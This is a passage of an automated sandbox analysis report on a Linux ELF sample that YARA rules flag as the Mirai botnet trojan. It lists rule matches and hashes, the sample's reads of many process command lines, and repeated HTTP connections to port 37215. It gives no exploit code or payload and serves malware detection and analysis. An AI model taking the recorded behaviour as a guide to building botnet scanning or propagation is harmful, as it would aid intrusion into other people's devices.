          Source: x86.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: x86.nn.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6220.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
          Source: classification engineClassification label: mal92.troj.linELF@0/0@2/0
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1582/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/3088/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1579/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1699/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1335/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1698/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1334/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1576/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/2302/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/910/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/912/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/2307/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/918/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6241/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6240/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6243/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/14/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6242/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/15/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6245/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/16/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6244/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/17/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6247/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/18/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6246/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1594/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/120/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/121/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1349/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/122/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/243/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/123/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/2/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/124/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/3/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/4/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/125/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/126/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1344/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1465/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1586/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/127/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/248/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/128/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/249/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1463/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/800/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6238/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/9/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/801/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6237/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6239/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/20/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/21/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1900/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/22/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6252/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/23/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6251/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/24/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6254/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/25/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6253/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/26/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/27/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/28/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/29/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/491/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/250/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/130/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/251/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/6250/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/252/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/132/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/253/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/254/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/255/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/256/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/1599/cmdlineJump to behavior
          Source: /tmp/x86.nn.elf (PID: 6222)File opened: /proc/257/cmdlineJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47496 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50322 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56392 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58056 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34812 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37490 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40452 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32816 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38692 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48418 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56050 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37890 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56212 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56486 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57810 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32960 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57218 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56740 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58310 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55990 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37232 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39074 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44464 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56764 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58250 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40428 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52548 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38602 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38020 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41690 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33684 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34178 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35458 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34696 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58182 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37178 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38648 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46336 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58800 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39484 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55258 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39482 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33090 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41528 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37400 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49018 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41040 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58820 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56254 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52692 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58396 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60200 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56646 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34798 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40826 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47828 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57046 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52578 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46426 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57624 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58072 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48304 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36818 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48742 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59160 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37998 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48998 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45822 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48686 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44414 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39230 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52640 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60088 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60136 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59926 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43154 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36894 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42112 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59814 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39258 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42510 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40402 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42030 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46140 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54506 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34766 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59122 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34112 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40220 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35084 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40746 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57948 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52544 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34646 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37766 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41492 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53188 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49040 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40392 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46418 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47174 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42674 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45772 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44952 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54796 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34116 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48022 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49598 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41132 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47830 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44416 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59900 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35088 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49158 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54002 -> 37215
